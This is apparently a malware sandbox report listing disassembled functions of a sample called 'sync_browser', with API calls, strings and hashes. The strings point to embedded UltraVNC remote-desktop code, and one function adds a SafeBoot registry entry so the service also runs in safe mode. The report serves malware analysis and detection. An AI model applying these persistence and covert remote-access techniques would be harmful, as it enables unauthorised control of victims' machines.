Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Console$WTSEnumerateSessionsA$WTSFreeMemory$wtsapi32
API String ID: 145871493-4083478734
Opcode ID: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
Instruction ID: 799f3529160f7f1d5372f5a25f12c48d4a02fdc8846eccda2b1f60e2ccf9a589
Opcode Fuzzy Hash: 6cf080f84c71be26cb1bfa4edcfbd06d998d32083e0e310b716d811f44676067
Instruction Fuzzy Hash: D241A537A19B8295EB61CF16E84026AB2A4FFA4750F580135ED9DC3798EF3CE45AC700

Function 00007FF67E7E0430 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 86libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7E0481
LoadLibraryA.KERNEL32 ref: 00007FF67E7E04CD

Part of subcall function 00007FF67E87A220: _errno.LIBCMT ref: 00007FF67E87A168
Part of subcall function 00007FF67E87A220: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87A173

GetModuleFileNameA.KERNEL32 ref: 00007FF67E7E04F5
LoadLibraryA.KERNEL32 ref: 00007FF67E7E0541
GetProcAddress.KERNEL32 ref: 00007FF67E7E0559
FreeLibrary.KERNEL32 ref: 00007FF67E7E057A

Strings

\logging.dll, xrefs: 00007FF67E7E04AA, 00007FF67E7E051E
vncclient.cpp : authentication failed, xrefs: 00007FF67E7E045F
LOGFAILED, xrefs: 00007FF67E7E04DF
LOGLOGON, xrefs: 00007FF67E7E054F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$FileLoadModuleName$AddressFreeProc_errno_invalid_parameter_noinfo
String ID: LOGFAILED$LOGLOGON$\logging.dll$vncclient.cpp : authentication failed
API String ID: 2822070703-2230024269
Opcode ID: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
Instruction ID: b3ab0049892aad68c98ee2c843b711c59f8c7c0e439dd527e5d56c7edeeb28f0
Opcode Fuzzy Hash: 7268cd8e022df83657ed39b417004c309e717e39cebfd43f9550cd34ab281d12
Instruction Fuzzy Hash: 57415827B6CB8195EB50CF19F8542A9A3A4FB58790F404236E96D877D4DF3CE508C710

Function 00007FF67E82A4A0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 70COMMON

Download Yara Rule

APIs

OpenDesktopA.USER32 ref: 00007FF67E82A4ED

Part of subcall function 00007FF67E82A3B0: GetCurrentThreadId.KERNEL32 ref: 00007FF67E82A3E3
Part of subcall function 00007FF67E82A3B0: GetThreadDesktop.USER32 ref: 00007FF67E82A3EB
Part of subcall function 00007FF67E82A3B0: GetUserObjectInformationA.USER32 ref: 00007FF67E82A411

OpenInputDesktop.USER32(?,?,?,00007FF67E7EF09C), ref: 00007FF67E82A50B
CloseDesktop.USER32(?,?,?,00007FF67E7EF09C), ref: 00007FF67E82A556
CloseDesktop.USER32(?,?,?,00007FF67E7EF09C), ref: 00007FF67E82A58F

Strings

vncservice.cpp : OpenInputdesktop2 named, xrefs: 00007FF67E82A4D3
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E82A53B
vncservice.cpp : OpenInputdesktop2 , xrefs: 00007FF67E82A522
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E82A4F5
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E82A4B0
vncservice.cpp : SelectDesktop failed to close desktop, xrefs: 00007FF67E82A560

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseOpenThread$CurrentInformationInputObjectUser
String ID: vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : OpenInputdesktop2 named$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
API String ID: 82840795-1493190668
Opcode ID: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
Instruction ID: f1eaf379f9bae61cec622c4f8c6a665d85703578a60d002cf17c4f39ad2704b1
Opcode Fuzzy Hash: 73df31c4d5bc5f508eb8bf5ae158792ec5ac75f1685a591efa5a54c35b3d65c6
Instruction Fuzzy Hash: FD218563F3894390FB84DBA5E9441F6935AAFB8744F485072F91ECA165DE3CE58D8200

Function 00007FF67E7F0700 Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32 ref: 00007FF67E7F071E
Sleep.KERNEL32 ref: 00007FF67E7F072C
IsWindow.USER32 ref: 00007FF67E7F0735
GetCurrentThread.KERNEL32 ref: 00007FF67E7F0744
SetThreadPriority.KERNEL32 ref: 00007FF67E7F074F
WaitForSingleObject.KERNEL32 ref: 00007FF67E7F0768
PostMessageA.USER32 ref: 00007FF67E7F0780
IsWindow.USER32 ref: 00007FF67E7F0789
CloseHandle.KERNEL32 ref: 00007FF67E7F07A6

Strings

VncEvent, xrefs: 00007FF67E7F0710

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ThreadWindow$CloseCurrentEventHandleMessageObjectOpenPostPrioritySingleSleepWait
String ID: VncEvent
API String ID: 2428488660-2681191898
Opcode ID: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
Instruction ID: 42e733fefa578ec2508ec69c2a4669e0bdc88103bbb564ee3146c69bf06dcf81
Opcode Fuzzy Hash: 78b1a00b88fe3fbd3304328edc48d2619275dfc3e1a6d7d438e00feda673ce81
Instruction Fuzzy Hash: AD117712F2C64342FF548F25EA543799395EFA9B89F085070F90EC6790DE2CA44DCB10

Function 00007FF67E7EB510 Relevance: 16.7, APIs: 11, Instructions: 172filetimeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF67E7EB58C
SetEndOfFile.KERNEL32 ref: 00007FF67E7EB5BC
FlushFileBuffers.KERNEL32 ref: 00007FF67E7EB5C9
SystemTimeToFileTime.KERNEL32 ref: 00007FF67E7EB645
SetFileTime.KERNEL32 ref: 00007FF67E7EB65E
CloseHandle.KERNEL32 ref: 00007FF67E7EB671
DeleteFileA.KERNEL32 ref: 00007FF67E7EB6C2
GetFileAttributesA.KERNEL32 ref: 00007FF67E7EB727
SetFileAttributesA.KERNEL32 ref: 00007FF67E7EB741
MoveFileExA.KERNEL32 ref: 00007FF67E7EB753
SetFileAttributesA.KERNEL32 ref: 00007FF67E7EB76B

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$AttributesTime$BuffersCloseCountDeleteFlushHandleMoveSystemTick
String ID:
API String ID: 2697342021-0
Opcode ID: 07e862b9386f2056e9fc849ddc299adfbd19194fd9753bd57056fa84474d4813
Instruction ID: 63b2090100238ca420ab7e29450e772cc84ad5d3ef99eb82db920653bbbd82e3
Opcode Fuzzy Hash: 07e862b9386f2056e9fc849ddc299adfbd19194fd9753bd57056fa84474d4813
Instruction Fuzzy Hash: A3818F27A28A8195EB10DF74D4543ED2764EF54BA8F440235EE2D9BAE9CF3CD149C314

Function 00007FF67E7ED930 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF67E7ED95E

Part of subcall function 00007FF67E8579A0: EnterCriticalSection.KERNEL32 ref: 00007FF67E8579C7
Part of subcall function 00007FF67E8579A0: LeaveCriticalSection.KERNEL32 ref: 00007FF67E8579E9
Part of subcall function 00007FF67E8579A0: CreateSemaphoreA.KERNEL32 ref: 00007FF67E857A03
Part of subcall function 00007FF67E8579A0: GetLastError.KERNEL32 ref: 00007FF67E857A15

Part of subcall function 00007FF67E7CD9D0: OpenFileMappingA.KERNEL32 ref: 00007FF67E7CDA07
Part of subcall function 00007FF67E7CD9D0: MapViewOfFile.KERNEL32 ref: 00007FF67E7CDA2D

InitializeCriticalSection.KERNEL32 ref: 00007FF67E7ED9EB

Part of subcall function 00007FF67E7C4680: InitializeCriticalSection.KERNEL32 ref: 00007FF67E7C46A0
Part of subcall function 00007FF67E7C4680: GetModuleHandleA.KERNEL32 ref: 00007FF67E7C46C5
Part of subcall function 00007FF67E7C4680: GetProcAddress.KERNEL32 ref: 00007FF67E7C46DA
Part of subcall function 00007FF67E7C4680: GetModuleHandleA.KERNEL32 ref: 00007FF67E7C46F2
Part of subcall function 00007FF67E7C4680: GetProcAddress.KERNEL32 ref: 00007FF67E7C4707
Part of subcall function 00007FF67E7C4680: GetTickCount.KERNEL32 ref: 00007FF67E7C475E

LoadLibraryA.KERNEL32 ref: 00007FF67E7EDA0D
GetProcAddress.KERNEL32 ref: 00007FF67E7EDA30
LoadLibraryA.KERNEL32 ref: 00007FF67E7EDA51
GetProcAddress.KERNEL32 ref: 00007FF67E7EDA6D

Strings

ChangeWindowMessageFilter, xrefs: 00007FF67E7EDA63
GetCursorInfo, xrefs: 00007FF67E7EDA26
user32.dll, xrefs: 00007FF67E7EDA06, 00007FF67E7EDA4A

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
API String ID: 173432231-678763868
Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
Instruction ID: de3997ed1a99df6dd0c00b60df5583dfd18ad66ea63aec799e3c4f1bde4a054e
Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
Instruction Fuzzy Hash: C8411132729B41A2E748DF24E9802E9B3A8FB54754F504135E7AD837A0DFBDA4B9C300

Function 00007FF67E7C68F0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7C692F
RegQueryValueExA.ADVAPI32 ref: 00007FF67E7C696B
RegCloseKey.ADVAPI32 ref: 00007FF67E7C6A00

Strings

Multiprocessor Checked, xrefs: 00007FF67E7C69DC
CurrentType, xrefs: 00007FF67E7C6947
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF67E7C6913
Multiprocessor Free, xrefs: 00007FF67E7C69BB
Uniprocessor Checked, xrefs: 00007FF67E7C699A
Uniprocessor Free, xrefs: 00007FF67E7C6979

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
API String ID: 3677997916-1370392681
Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
Instruction ID: 1eef49b0bdfa1dbc3571957f9570c4d214f4db50d28fd3886b62419e1a4726ee
Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
Instruction Fuzzy Hash: AA315472B2864381FB108B21E4447AAB368FB65748F805235FA8D865E9EF3CD14DCB01

Function 00007FF67E7F07C0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 60windowCOMMON

Download Yara Rule

APIs

CreateDIBSection.GDI32 ref: 00007FF67E7F0812
CreateCompatibleBitmap.GDI32 ref: 00007FF67E7F0851
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF67E7EF2A3), ref: 00007FF67E7F085F
DeleteObject.GDI32 ref: 00007FF67E7F08AF

Strings

vncdesktop.cpp : failed to build DIB section - reverting to slow blits, xrefs: 00007FF67E7F082A
vncdesktop.cpp : failed to create memory bitmap(%d), xrefs: 00007FF67E7F0865
vncdesktop.cpp : attempting to enable DIBsection blits, xrefs: 00007FF67E7F07D7
vncdesktop.cpp : enabled slow blits OK, xrefs: 00007FF67E7F0882
vncdesktop.cpp : enabled fast DIBsection blits OK, xrefs: 00007FF67E7F0897

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
API String ID: 554953491-3667255696
Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
Instruction ID: 0caab4507f79254080c0f45628c5609f1f8c3319804e72e9fec246a0cb38c20e
Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
Instruction Fuzzy Hash: E9315A36A28A8695EB00DFA4E4444E9B365FB68B48F880532EE4D87758EF7CE149C750

Function 00007FF67E7D3110 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 00007FF67E7D3155

Part of subcall function 00007FF67E87851C: _errno.LIBCMT ref: 00007FF67E878553
Part of subcall function 00007FF67E87851C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87855E

RegCreateKeyExA.ADVAPI32 ref: 00007FF67E7D3199
RegSetValueExA.ADVAPI32 ref: 00007FF67E7D31C7
RegCloseKey.ADVAPI32 ref: 00007FF67E7D31D2

Strings

Service, xrefs: 00007FF67E7D31A8
?, xrefs: 00007FF67E7D3189
SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s, xrefs: 00007FF67E7D3137
Network, xrefs: 00007FF67E7D3130
uvnc_service, xrefs: 00007FF67E7D3129

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
API String ID: 913464532-2910635102
Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
Instruction ID: ac6f13f4ff3a04e872852f93fb421d3c4caca2562afb6bea715f5df3b9585f48
Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
Instruction Fuzzy Hash: 77218E72A28A8282EB60DB50F45576AB3A0FB95358F800135F78D83BA8DF7DD15DCB00

Function 00007FF67E7E6CAA Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 256COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E7BAC

Part of subcall function 00007FF67E7EB510: GetTickCount.KERNEL32 ref: 00007FF67E7EB58C
Part of subcall function 00007FF67E7EB510: SetEndOfFile.KERNEL32 ref: 00007FF67E7EB5BC
Part of subcall function 00007FF67E7EB510: FlushFileBuffers.KERNEL32 ref: 00007FF67E7EB5C9
Part of subcall function 00007FF67E7EB510: SystemTimeToFileTime.KERNEL32 ref: 00007FF67E7EB645
Part of subcall function 00007FF67E7EB510: SetFileTime.KERNEL32 ref: 00007FF67E7EB65E
Part of subcall function 00007FF67E7EB510: CloseHandle.KERNEL32 ref: 00007FF67E7EB671
Part of subcall function 00007FF67E7EB510: DeleteFileA.KERNEL32 ref: 00007FF67E7EB6C2

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 744660428-3977938048
Opcode ID: 22d3f79c29f8bed9973b836a1b5c39f0fdd4d046a5132f2854201d0e710f81bf
Instruction ID: d0b1e0099436a6761b59351e824c6c0acff53d92ac1ac4636fb9f36db7f2d761
Opcode Fuzzy Hash: 22d3f79c29f8bed9973b836a1b5c39f0fdd4d046a5132f2854201d0e710f81bf
Instruction Fuzzy Hash: 56D18223A18AC185FB50CB25C4487FE2BA5EBA5B88F194175EA4C8B7E5DF3DE449C700

Function 00007FF67E7E69D5 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 224COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2
GetTickCount.KERNEL32 ref: 00007FF67E7E41B3

Part of subcall function 00007FF67E7EC4E0: timeGetTime.WINMM ref: 00007FF67E7EC52A
Part of subcall function 00007FF67E7EC4E0: EnterCriticalSection.KERNEL32 ref: 00007FF67E7EC551
Part of subcall function 00007FF67E7EC4E0: RevertToSelf.ADVAPI32 ref: 00007FF67E7EC56C
Part of subcall function 00007FF67E7EC4E0: LeaveCriticalSection.KERNEL32 ref: 00007FF67E7EC57C

LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E7BAC

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
